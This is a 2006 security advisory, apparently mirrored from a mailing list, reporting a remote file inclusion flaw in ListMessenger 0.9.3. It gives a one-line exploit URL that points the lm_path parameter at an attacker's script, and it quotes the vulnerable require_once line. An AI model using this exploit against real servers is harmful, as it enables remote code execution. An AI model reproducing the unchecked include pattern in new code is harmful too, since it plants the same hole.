Computer Security

Security Advisory: ListMessenger v0.9.3 Remote File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities

  [KurdishVanilla CMS <= 1.0.1 (RootDirectory)
Remote file inclusion Vuln.]

  [Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo & Joomla]

  DotClear : Multiples Full Path Disclosure

From:x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date:24.07.2006
Subject:ListMessenger v0.9.3 Remote File Inclusion Vulnerability

ListMessenger v0.9.3 Remote File Inclusion Vulnerability

-

Discoverd By : xoron

-

Conatact : x0r0n[at]hotmail.com

-

script: ListMessenger 0.9.3

-

URL: http://www.listmessenger.com

-

Exp: www.target.com/[path]/enduser/listmessenger.php?lm_path=evil_script?

-

Code:  require_once($lm_path."config.inc.php")

-

XORON - Cyber-Warrior.org
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server